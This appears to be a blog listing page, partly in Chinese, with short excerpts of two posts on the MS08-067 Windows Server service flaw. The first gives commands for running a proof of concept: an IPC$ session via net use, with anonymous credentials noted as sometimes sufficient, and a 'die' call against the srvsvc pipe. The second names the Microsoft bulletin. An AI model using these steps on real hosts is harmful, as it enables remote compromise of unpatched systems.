In vstudio command prompt:
mk.bat
next:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/…)
net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc
In some cases, /user:”” “”, will suffice (i.e., anonymous connection)
阅读全文 »
Tags: MS08-067,
PoC
Microsoft 安全公告 MS08-067 – 严重
服务器服务中的漏洞可能允许远程执行代码 (958644)
下载地址:
阅读全文 »
Tags: MS08-067